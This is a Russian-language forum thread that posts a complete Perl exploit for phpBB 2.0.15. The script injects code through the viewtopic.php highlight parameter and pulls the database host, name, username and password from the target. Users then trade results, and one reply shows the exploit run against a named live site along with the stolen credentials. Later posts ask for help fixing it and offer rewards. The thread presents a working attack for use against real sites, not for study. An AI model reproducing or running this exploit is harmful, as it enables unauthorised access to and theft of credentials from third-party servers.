Форумы PhpBB 2.0.15 Database Authentication Details Exploit

VARVAR · 31 Aug 2005

Code:

#!/usr/bin/perl

# **************************************************************
#**
#** phpBB 2.0.15 Viewtopic.PHP Remote Code Execution Vulnerability 
#** This exploit gives the user all the details about the database 
#** connection such as database host, username, password and 
#** database name.
#**
#** Written by SecureD, gvr.secured<AT>gmail<DOT>com,2005 
#** 
#** Greetings to GvR, Jumento, PP, CKrew & friends
#**
# **************************************************************

use IO::Socket;

print "+-----------------------------------------------------------------------+\r\n";
print "| PhpBB 2.0.15 Database Authentication Details Exploit |\r\n";
print "| By SecureD gvr.secured<AT>gmail<DOT>com |\r\n";
print "+-----------------------------------------------------------------------+\r\n";

if (@ARGV < 3)
{
print "Usage:\r\n";
print "phpbbSecureD.pl SERVER DIR THREADID COOKIESTRING\r\n\r\n";
print "SERVER - Server where PhpBB is installed.\r\n";
print "DIR - PHPBB directory or / for no directory.\r\n";
print "THREADID - Id of an existing thread.\r\n";
print "COOKIESTRING - Optional, cookie string of the http request.\r\n";
print " Use this when a thread needs authentication for viewing\r\n";
print " You can use Firefox in combination with \"Live HTTP\r\n";
print " Headers\" to get this cookiestring.\r\n\r\n";
print "Example 1 (with cookiestring):\r\n";
print "phpbbSecured.pl 192.168.168.123 /PHPBB/ 8 \"
phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22
autologinid%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22
userid%22%3Bs%3A1%3A%222%22%3B%7D; 
phpbb2mysql_sid=10dae92b780914332896df43808c4e09\" \r\n\r\n";
print "Example 2 (without cookiestring):\r\n";
print "phpbbSecured.pl 192.168.168.123 /PHPBB/ 20 \r\n";
exit();
}
$serv = $ARGV[0];
$dir = $ARGV[1];
$threadid = $ARGV[2];
$cookie = $ARGV[3];

$serv =~ s/http:\/\///ge;
$delimit = "superloneEST";

$sploit = $dir . "viewtopic.php?t=";
$sploit .= $threadid;
$sploit .= "&highlight='.printf($delimit.";
$sploit .= "\$dbhost.";
$sploit .= "$delimit.";
$sploit .= "\$dbname.";
$sploit .= "$delimit.";
$sploit .= "\$dbuser.";
$sploit .= "$delimit.";
$sploit .= "\$dbpasswd.";
$sploit .= "$delimit).'";

print $sploit,"\n";
$sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$serv", PeerPort=>"80")
or die "[+] Connecting ... Could not connect to host.\n\n";

print "[+] Connecting OK\n";
sleep(1);

print "[+] Sending exploit ";
print $sock "GET $sploit HTTP/1.1\r\n";
print $sock "Host: $serv\r\n";
if ( defined $cookie) {
print $sock "Cookie: $cookie \r\n";
}
print $sock "Connection: close\r\n\r\n";


$succes = 0;

while ($answer = <$sock>) {
$delimitIndex = index $answer, $delimit;
if ($delimitIndex >= 0) {
$succes = 1;
$urlIndex = index $answer, "href";
if ($urlIndex < 0){
$answer = substr($answer, length($delimit));
$length = 0;
while (length($answer) > 0) {
$nex = index($answer, $delimit);
if ($nex > 0) {
push(@array, substr($answer, 0, $nex));
$answer = substr($answer, $nex + length($delimit), length($answer));
} else {
$answer= "";
}
}
}
}
}

close($sock);

if ($succes == 1) {
print "OK\n";
sleep(1);
print "[+] Database Host: " . $array[0] . "\n";
sleep(1);
print "[+] Database Name: " . $array[1] . "\n";
sleep(1);
print "[+] Username: " . $array[2] . "\n";
sleep(1);
print "[+] Password: " . $array[3] . "\n";
sleep(1);
} else {
print "FAILED\n";
}

Tier · 31 Aug 2005

/forum/viewtopic.php?t=1&highlight='.printf(superloneEST.$dbhost.superloneEST.$d
bname.superloneEST.$dbuser.superloneEST.$dbpasswd.superloneEST).'
[+] Connecting OK
[+] Sending exploit OK
[+] Database Host:
[+] Database Name:
[+] Username:
[+] Password:
Click to expand...

вот такие пироги, в нужных местах пропуски )

Dj Skeleton™ · 31 Aug 2005

ребята, объясните как заставить это работать.

Internal Server Error
The server encountered an internal error or misconfiguration and was unable to complete your request.

Please contact the server administrator, [email protected] and inform them of the time the error occurred, and anything you might have done that may have caused the error.

More information about this error may be available in the server error log.

Apache/1.3.28 Server at www.xxxxx.xxx Port 80
Click to expand...

VARVAR · 31 Aug 2005

Работает только на phpBB 2.0.15.

H:\temp>phpbb.pl boastology.com /forum/ 1266
+-----------------------------------------------------------------------+
| PhpBB 2.0.15 Database Authentication Details Exploit |
| By SecureD gvr.secured<AT>gmail<DOT>com |
+-----------------------------------------------------------------------+
[+] Connecting OK
[+] Sending exploit OK
[+] Database Host: localhost
[+] Database Name: boast_phpbb1
[+] Username: boast_phpbb1
[+] Password: cLuTa5OpQx

Tier · 31 Aug 2005

VARVAR said:

Работает только на phpBB 2.0.15.

H:\temp>phpbb.pl boastology.com /forum/ 1266
+-----------------------------------------------------------------------+
| PhpBB 2.0.15 Database Authentication Details Exploit |
| By SecureD gvr.secured<AT>gmail<DOT>com |
+-----------------------------------------------------------------------+
[+] Connecting OK
[+] Sending exploit OK
[+] Database Host: localhost
[+] Database Name: boast_phpbb1
[+] Username: boast_phpbb1
[+] Password: cLuTa5OpQx
Click to expand...

а где же собака зарыта?
у мну всеравно пропуски.

Manoz · 4 Sep 2005

Что делать с этим:
<code>
| PhpBB 2.0.15 Database Authentication Details Exploit |
| By SecureD gvr.secured<AT>gmail<DOT>com |
+-----------------------------------------------------------------------+
[+] Connecting OK
[+] Sending exploit OK
[+] Database Host:
[+] Database Name:
[+] Username:
[+] Password:
</code>

Опять защита от ламеров?

Grrl · 4 Oct 2005

бесполезный сплойт имхо под эту версию форумов есть сплойт удаленного исполнения команд это куда полезнее.

2stalles

URL http://downloads.activestate.com/ActivePerl/Windows/5.8/ActivePerl-5.8.3.809-MSWin32-x86.msi
вот тее перл.
ленивый народ стал ёпть...

Miller · 7 Oct 2005

screen:

Вопрос: почему не коннектится ???

KP0T · 2 Dec 2005

Аналогично это интересует и меня... Почему?!

m0nzt3r · 2 Dec 2005

Ну наверное прикрыли... да и Grrl говорит правду лучше бы сразу тем сплойтом бы пользовались..

LeopardSS · 1 Feb 2007

млин что там править нужно что бы пустых строк не было, плз хоть в личку киньте. С меня плюсик будет

LeopardSS · 1 Feb 2007

кто поможет, тому отдам семизнак и плюсы

Форумы PhpBB 2.0.15 Database Authentication Details Exploit

VARVAR New Member

Tier New Member

Dj Skeleton™ Member

VARVAR New Member

Tier New Member

Manoz Elder - Старейшина

Grrl Elder - Старейшина

Miller New Member

KP0T New Member

m0nzt3r моня

LeopardSS Elder - Старейшина

LeopardSS Elder - Старейшина

Useful Searches

Форумы PhpBB 2.0.15 Database Authentication Details Exploit

VARVAR New Member

Tier New Member

Dj Skeleton™ Member

VARVAR New Member

Tier New Member

Manoz Elder - Старейшина

Grrl Elder - Старейшина

Miller New Member

KP0T New Member

m0nzt3r моня

LeopardSS Elder - Старейшина

LeopardSS Elder - Старейшина